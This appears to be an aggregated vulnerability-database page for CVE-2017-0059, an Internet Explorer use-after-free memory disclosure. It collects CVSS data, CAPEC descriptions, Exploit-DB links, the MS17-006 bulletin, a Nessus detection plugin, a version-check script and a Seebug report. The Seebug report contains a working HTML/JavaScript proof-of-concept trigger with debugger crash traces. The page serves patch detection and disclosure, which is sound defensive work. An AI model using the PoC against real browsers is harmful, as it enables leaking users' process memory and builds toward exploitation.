CVE-2017-0059 - Information Exposure vulnerability in Microsoft Internet Explorer 10/11/9

CVSS 4.3 - MEDIUM
Attack vector: NETWORK
Attack complexity: MEDIUM
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: NONE
Availability impact: NONE

Tags: network, microsoft, CWE-200, nessus, exploit available

Summary

Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0008 and CVE-2017-0009.

Vulnerable Configurations

Part         Description   Count
Application  Microsoft     3

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a program's vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, in that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible while the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of JavaScript to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser, including its version, to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero-day weaknesses in the type and version of the browser used by the victim. Automating this process via JavaScript as part of the same delivery system used to exploit the browser is considered more efficient, as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in JavaScript and delivered in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session IDs in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Exploit-Db

  • file: exploits/windows_x86/remote/43125.html
    id: EDB-ID:43125
    last seen: 2018-11-30
    modified: 2017-10-17
    platform: windows_x86
    published: 2017-10-17
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/43125
    title: Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
    type: remote
  • description: Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006). CVE-2017-0059. DoS exploit for Windows platform. Tags: Denial of Service ...
    file: exploits/windows/dos/41661.html
    id: EDB-ID:41661
    last seen: 2017-03-20
    modified: 2017-03-20
    platform: windows
    published: 2017-03-20
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/41661/
    title: Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)
    type: dos
  • id: EDB-ID:42354

Msbulletin

bulletin_id: MS17-006
date: 2017-03-14T00:00:00
impact: Remote Code Execution
knowledgebase_id: 4013073
severity: Critical
title: Cumulative Security Update for Internet Explorer

Nessus

NASL family: Windows : Microsoft Bulletins
NASL id: SMB_NT_MS17-006.NASL
description: The version of Internet Explorer installed on the remote Windows host is missing Cumulative Security Update 4013073. It is, therefore, affected by multiple vulnerabilities, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 97729
published: 2017-03-14
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/97729
title: MS17-006: Cumulative Security Update for Internet Explorer (4013073)
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(97729);
  script_version("1.14");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id(
    "CVE-2017-0008",
    "CVE-2017-0009",
    "CVE-2017-0012",
    "CVE-2017-0018",
    "CVE-2017-0033",
    "CVE-2017-0037",
    "CVE-2017-0040",
    "CVE-2017-0049",
    "CVE-2017-0059",
    "CVE-2017-0130",
    "CVE-2017-0149",
    "CVE-2017-0154"
  );
  script_bugtraq_id(
    96073,
    96077,
    96085,
    96086,
    96087,
    96088,
    96094,
    96095,
    96645,
    96647,
    96724,
    96766
  );
  script_xref(name:"MSFT", value:"MS17-006");
  script_xref(name:"MSKB", value:"3218362");
  script_xref(name:"MSKB", value:"4012204");
  script_xref(name:"MSKB", value:"4012215");
  script_xref(name:"MSKB", value:"4012216");
  script_xref(name:"MSKB", value:"4012217");
  script_xref(name:"MSKB", value:"4012606");
  script_xref(name:"MSKB", value:"4013198");
  script_xref(name:"MSKB", value:"4013429");

  script_name(english:"MS17-006: Cumulative Security Update for Internet Explorer (4013073)");
  script_summary(english:"Checks the version of mshtml.dll or the installed rollup.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host has a web browser installed that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Internet Explorer installed on the remote Windows host
is missing Cumulative Security Update 4013073. It is, therefore,
affected by multiple vulnerabilities, the most severe of which are
remote code execution vulnerabilities. An unauthenticated, remote
attacker can exploit these vulnerabilities by convincing a user to
visit a specially crafted website, resulting in the execution of
arbitrary code in the context of the current user.");
  script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-006");
  script_set_attribute(attribute:"solution", value:
"Microsoft has released a set of patches for Internet Explorer 9, 10,
and 11.

Note that security update 3218362 in MS17-006 must also be installed
in order to fully resolve CVE-2017-0008 on Windows Vista and Windows
Server 2008.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-0149");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/02/23");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/14");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:ie");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows : Microsoft Bulletins");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl", "smb_check_rollup.nasl");
  script_require_keys("SMB/MS_Bulletin_Checks/Possible");
  script_require_ports(139, 445, "Host/patch_management_checks");

  exit(0);
}

include("audit.inc");
include("smb_hotfixes_fcheck.inc");
include("smb_hotfixes.inc");
include("smb_func.inc");
include("misc_func.inc");

get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = 'MS17-006';
kbs = make_list(
  '4012204', # ie9 ; vista and 2008
  '3218362', # ie9 ; api messaging ; vista and 2008
  '4012204', # ie10 sec rollup ; 2012
  '4012217', # ie10 reg rollup ; 2012
  '4012204', # ie11 sec rollup ; 7 and 2008 r2
  '4012215', # ie11 reg rollup ; 7 and 2008 r2
  '4012204', # ie11 sec rollup ; 8.1 and 2012 r2
  '4012216', # ie11 reg rollup ; 8.1 and 2012 r2
  '4012606', # ie11 rollup ; win 10
  '4013198', # ie11 rollup ; win 10 1511
  '4013429'  # ie11 rollup ; win 10 1607
);

if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);

get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

if (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0',  win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);

productname = get_kb_item_or_exit("SMB/ProductName", exit_code:1);
if ("Windows 8" >< productname && "8.1" >!< productname)
 audit(AUDIT_OS_SP_NOT_VULN);

if (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);

share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);

if (
  # Windows 10 1607
  smb_check_rollup(os:"10", sp:0, os_build:"14393", rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4013429)) ||
  # Windows 10 1511
  smb_check_rollup(os:"10", sp:0, os_build:"10586", rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||
  # Windows 10
  smb_check_rollup(os:"10", sp:0, os_build:"10240", rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||

  # Windows 8.1 / Windows Server 2012 R2
  # Internet Explorer 11
  ( smb_check_rollup(os:"6.3", sp:0, rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012216)) &&
    hotfix_is_vulnerable(os:"6.3", sp:0, file:"mshtml.dll", version:"11.0.9600.18618", min_version:"11.0.9600.16000", dir:"\system32", bulletin:bulletin, kb:"4012204")) ||

  # Windows Server 2012
  # Internet Explorer 10
  ( smb_check_rollup(os:"6.2", sp:0, rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012217)) &&
    hotfix_is_vulnerable(os:"6.2", sp:0, file:"mshtml.dll", version:"10.0.9200.22104", min_version:"10.0.9200.16000", dir:"\system32", bulletin:bulletin, kb:"4012204")) ||

  # Windows 7 / Server 2008 R2
  # Internet Explorer 11
  ( smb_check_rollup(os:"6.1", sp:1, rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012215)) &&
    hotfix_is_vulnerable(os:"6.1", sp:1, file:"mshtml.dll", version:"11.0.9600.18618", min_version:"11.0.9600.16000", dir:"\system32", bulletin:bulletin, kb:"4012204")) ||

  # Vista / Windows Server 2008
  # Internet Explorer 9
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"mshtml.dll", version:"9.0.8112.20985", min_version:"9.0.8112.20000", dir:"\system32", bulletin:bulletin, kb:"4012204") ||
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"mshtml.dll", version:"9.0.8112.16871", min_version:"9.0.8112.16000", dir:"\system32", bulletin:bulletin, kb:"4012204") ||

  # KB 3218362 / Vista and Windows Server 2008 / Inetcomm.dll
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"inetcomm.dll", version:"6.0.6002.24052", min_version:"6.0.6002.23000", dir:"\system32", bulletin:bulletin, kb:"3218362") ||
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"inetcomm.dll", version:"6.0.6002.19728", min_version:"6.0.6002.18000", dir:"\system32", bulletin:bulletin, kb:"3218362")
)
{
  set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);
  hotfix_security_hole();
  hotfix_check_fversion_end();
}
else
{
  hotfix_check_fversion_end();
  audit(AUDIT_HOST_NOT, hotfix_get_audit_report());
}
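The plugin above decides "missing MS17-006" by comparing the installed mshtml.dll build against a fixed build per OS/SP, with a lower bound that separates servicing branches (for example the two IE9 ranges on Vista). The following is an added example, not Tenable's code, that reproduces that file-version half of the check in Python: the version table is copied from the plugin's `hotfix_is_vulnerable()` calls, the host inventory is a constructed sample, and the range semantics (`min_version <= installed < version`) are an assumption about the plugin's helper.

```python
"""Version-range triage for mshtml.dll against the MS17-006 fixed builds.
Added example (not the Nessus plugin's code); the range semantics
min_version <= installed < fixed_version are assumed."""
from typing import List, Optional, Tuple

# (os, sp, min_version, fixed_version, kb), one row per mshtml.dll test
# in the plugin above.
MSHTML_RANGES: List[Tuple[str, int, str, str, str]] = [
    ("6.3", 0, "11.0.9600.16000", "11.0.9600.18618", "4012204"),  # 8.1 / 2012 R2, IE11
    ("6.2", 0, "10.0.9200.16000", "10.0.9200.22104", "4012204"),  # Server 2012, IE10
    ("6.1", 1, "11.0.9600.16000", "11.0.9600.18618", "4012204"),  # 7 / 2008 R2, IE11
    ("6.0", 2, "9.0.8112.20000",  "9.0.8112.20985",  "4012204"),  # Vista / 2008, IE9
    ("6.0", 2, "9.0.8112.16000",  "9.0.8112.16871",  "4012204"),  # Vista / 2008, IE9
]


def parse_version(v: str) -> Tuple[int, ...]:
    """Split a dotted file version into integers so the comparison is
    numeric (18618 > 9999), not a string comparison."""
    return tuple(int(part) for part in v.strip().split("."))


def missing_kb(os_version: str, sp: int, installed: str) -> Optional[str]:
    """Return the KB a host is missing when its mshtml.dll build falls inside
    a vulnerable range for that OS/SP, or None when it is at or above the
    fixed build or belongs to a different servicing branch."""
    inst = parse_version(installed)
    for os_v, sp_v, lo, hi, kb in MSHTML_RANGES:
        if os_v == os_version and sp_v == sp and parse_version(lo) <= inst < parse_version(hi):
            return kb
    return None


def triage(hosts: List[Tuple[str, str, int, str]]) -> List[Tuple[str, str]]:
    """Map (hostname, os, sp, mshtml.dll version) rows to (hostname, KB)."""
    findings = []
    for name, os_v, sp, ver in hosts:
        kb = missing_kb(os_v, sp, ver)
        if kb:
            findings.append((name, kb))
    return findings


# Constructed sample inventory; ws01 carries the build the Seebug report below
# confirms as affected (11.0.9600.18537).
SAMPLE_HOSTS = [
    ("ws01", "6.1", 1, "11.0.9600.18537"),
    ("ws02", "6.1", 1, "11.0.9600.18618"),
    ("srv03", "6.2", 0, "10.0.9200.22000"),
    ("old04", "6.0", 2, "9.0.8112.16871"),
]

if __name__ == "__main__":
    for host, kb in triage(SAMPLE_HOSTS):
        print(f"{host}: mshtml.dll below fixed build, missing KB{kb}")
```

On Windows 7, 8.1 and Server 2012 the plugin additionally requires the March 2017 rollup to be absent before the file test counts, so this example covers only the file-version condition.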

Seebug

bulletinFamily: exploit
description: There is a use-after-free bug in IE which can lead to info leak / memory disclosure. The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38).

PoC:

```
<!-- saved from url=(0014)about:internet -->
<script>
function run() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");
  textarea.appendChild(frame);
  frame.contentDocument.onreadystatechange = eventhandler;
  form.reset();
}
function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  alert("Text value freed, can be reallocated here");
}
</script>
<body onload=run()>
<form id="form">
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>
```

Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.

The root cause of the bug is actually a use-after-free on the textarea text value, which can be seen if the PoC is run with Page Heap enabled. In that case IE crashes at:

```
(b5c.f44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000
eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
msvcrt!wcscpy_s+0x46:
7582c006 0fb706          movzx   eax,word ptr [esi]       ds:002b:0e024ffc=????

0:008> k
 # ChildEBP RetAddr
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33
06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10
09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8
0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
0c 0a3ab5c0 706bda16 0x9780fd9
0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62
0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
0f 0a3ab990 706b6d73 0x9780fe1
10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42
13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2
14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7
15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a
16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d
17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210
18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150
1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5
1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90
1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146
1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0
1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed
1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d
20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12
21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c
22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103
23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23
24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109
25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5
26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf
27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7
29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe
2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70
2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b
```

where the old value was deleted at

```
0:008> !heap -p -a 0e024ffc
    address 0e024ffc found in
    _DPH_HEAP_ROOT @ f1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    dd03820:          e024000             2000
    7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
    77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033
    77b6de86 ntdll!RtlReAllocateHeap+0x00000054
    71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215
    71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026
    71b8f446 MSHTML!_HeapRealloc<0>+0x00000011
    7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546
    71678877 MSHTML!CBase::put_StringHelper+0x0000004d
    71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070
    706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d
    706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138
    706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
    70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
    70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
    70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
    706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
    706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
```

Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

![](https://images.seebug.org/1490080697476)
![](https://images.seebug.org/1490080704091)
id: SSV:92806
last seen: 2017-11-19
modified: 2017-03-21
published: 2017-03-21
reporter: fizz
source: https://www.seebug.org/vuldb/ssvid-92806
title: Microsoft IE: textarea.defaultValue memory disclosure (CVE-2017-0059)